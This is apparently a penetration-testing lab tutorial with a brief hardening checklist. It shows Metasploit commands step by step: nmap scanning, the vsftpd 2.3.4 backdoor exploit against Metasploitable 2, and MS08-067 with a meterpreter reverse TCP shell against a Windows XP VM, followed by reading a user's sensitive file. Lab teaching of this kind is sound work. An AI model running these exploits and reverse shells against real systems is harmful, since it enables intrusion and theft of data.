Common practices to reduce your system's vulnerabilities.

1.  Run regular vulnerability scans – it is recommended that you run a high level scan on your system at least once a month.
2.  Regularly patch and update your software – This well help you as these patches usually fix vulnerabilities that the software providers found.
3. Practice the principal of least privileges – This is done to minimize the harm an attacker can do so that they cannot can access to all the privileges within the system.
4. When setting up the system properly configure network settings.
5. Always keep your firewall on and have an update antivirus running as it provides a secondary firewall.
6. Use and enforce a strong and secure password policy – this will make attacking the system harder and more discouraging if it takes too long.
7. Always change the default passwords of network equipment
8. Make use of secure software development practices.

Using Metasploit to gain remote access to Metasploitable 2 server by creating a back door

Scenario 2

In this scinario we are trying to gain remote access to the metasploitable 2 server by using Metasploit within Kali.

Step 1: Descover the metasploitable servers IP Address and Open Ports

This is done using the netdiscover command in the linux turminal of Kali. After you have determained the IP address of the server write it down for easy access later In this instance the Targets IP Address is 192.168.152.129. To scan the server for open ports use the nmap -n -sV 192.168.152.129 command.

Figure 16 - Finding open ports on metasploitable server

Step 2: Choose a port to exploit.

In this scinario we are trying to create a backdoor into the metasploitable 2 server. let us see what our options are on port 21 - vsftpd. To do this let us start up our metasplout console by entering msfconsle command. After the console is open let us enter a command that will allow us to see what exploit there are for port 21 – vsftpd by entering search name:vsftpd into the terminal.

Figure 17 - Availible exploits for Port 21 – vsftpd

Perfect we see that there is a exploit that we can use from metasploits library that can creat us a backdoor into the system.

Step 3: Setup  and run exploit

For this step  enter use  exploit/unix/ftp/vsftpd_234_backdoor command  and then the  show options  command to get a list of availible options.

Figure 18 - Port 21 - vsftdp availible options

This step shows us ther we ave to assign the RHOST property by using the target’s IP Address and the following command set RHOST 192.168.152.129 After this has been completed we can enter the following command to show us a list of availible payloads that we can use to explout this port enter show payloads command then set the payload using set payload cmd/unix/interact  and use the  show options command to see if the payload has been set.

Figure 19 - Payload for port 21 Vsftdp is set

After we have established this we can then use the exploit command to deliver the payload and create our backdoor.

As we can see in figure 20 we can now remotly view and edit the content on the metasploitable server.

Figure 20 - Gained remote acess to Metasploutable server

Using Metasploit to remotly access a Windows XP computer and read files.

Scenario 1

A user using Windows XP is unaware of open ports on their system leaving it vulnerable. The victim has a file in his My Documents folder that is sensitive. It is our objective to read in discover the nature of the sensitive information within the file.

Step 1: Starting up our virtual machines

We will assume that the reader has prior knowledge of installing virtual machine software such as Oracle VirtualBox or VMWare and setting up these virtual machines.

We will then create three virtual machines for our scenario the one target machine Metasploitable 2; the Linux: Kali machine that has metasploit framework tool installed; and finally the other Target machine running Windows XP that we will try to exploit.

Figure 1 - Virtual Machines for scinario

Important notice: When running these machines please change the network settings in your Virtual machine software to run these machines on host-only connections. This is important as the machines we are using art vulnerable and allowing them internet connection to an unprotected network will leave us vulnerable to attack.

Once you have started up these three machines you should see the following screens.

Figure 2 - Windows XP tarhet machine with sensitive file on desktop

Figure 3 - Metasploitable 2 running

Figure 4 - Linux Kali with terminal open

Step 2: Finding the IP address of the target

For the following steps we will be entering text commands into the Linux Kali teminal as shown in Figure 4 - Linux Kali with terminal open. By entering the command netdiscover we will be presented with a list of IP addresses.

Figure 5 - List of IP addresses

We have determained that the Targets IP Address is by comparing the known IP addresses to the list and the one that was still unknow was 192.168.152.128 thus this is the IP address of the target. You will want to writ down the targets IP Address for quick access to it.

Step 3: Scan the target ip address for open ports

For this step we enter the following command into our linux terminal nmap -n -sV <Target IP Address> so for this scinario we will be using nmap -n -sV 192.168.152.128 to scan the targets system for any open ports that we can exploit.

Figure 6 - nmap scan for open ports

Now we can see a list of the open ports on the targets system write these down for later use. Note that the target is using Windows XP. This is important for the following step. As we will want to learn what

Step 3: Finding a exploit we can use

For this step we use the command msfconsole this command will the initilise an instance of the metasploitable package and allow us to access metasploit’s functionality.

In msfconsole (msf>) line tipe the following command 

msf> search platform:"Windows XP SP3" type:exploit This will list the available

exploits.

Doing an internet search and comparing the open ports the availed exploits we see 

that we can use Port 455 combined with exploit/windows/smb/ms08_067_netapi   

Figure 7 - Finding exploit

 We can now inter the exploit/windows/smb/ms08_067_netapi by entering msf> use exploit/windows/smb/ms08_067_netapi Command and then following it up with the show options command to see what we can exploit using this package. 

Figure 8 - List of exploits using package

Step 4: Setup the exploit

This exploit allows us to gain remote access to the targets computer

Now we need to set the RHOST property of metasplot so that it knows which system is being targeted. We do this by using the set RHOST <Target IP Address> command by using the ip address we wrote down earlier we can use set RHOST 192.168.152.128 to set our target.

Figure 9 - Set RHOST target IP Address

Now we need to set the payload that we will be using this is done by using the following command set payload windows/meterpreter/reverse_tcp to see if this worked use the show options command again and see if it lists payload options as follow

Figure 10 - Payload armed

Now we need to set the LHOST and LPORT properties LHOST will be the local linux machines IP we can get this ip from using the ifconfig command in a new terminal in linux for mt instance this ip is  192.168.152.130 so we use set LHOST 192.168.152.130 and set LPORT 6666

Now we launch the exploit by injecting our reverse shell “meterpreter” into the open port by using the exploit command to exploit the vulnatable target system. You will know it was successful when you see the following screen

Figure 11 - Exploit launched meterpreter reverse shell running

Step 5: Using meterpreter post exploitation

For our scinario our goal is to find a text document on the target’s desktop that contains sensitive information such as a password.

Now by using meterpreter we can navigate the targets filesystem. By entering the command Shell we enter the native Windows XP command prompt we then navigate to the usets my documets using the cd c:\Documents and Settings\Administrator\My Documents command and use the DIR Command to see a list of the files int the users Documents. We spot a text file named Sensitive_File.txt in the users documents and decide to investigate this file

Figure 12 - Brows target's file system

Figure 13 - Targets's My Documents.

To read the contents of Sensitive_File.txt we can use the command more Sensitive_File.txt  and we have discovered a password the user has for some missile system.

Figure 14 - Using more command

Figure 15 - Target machine viewing the file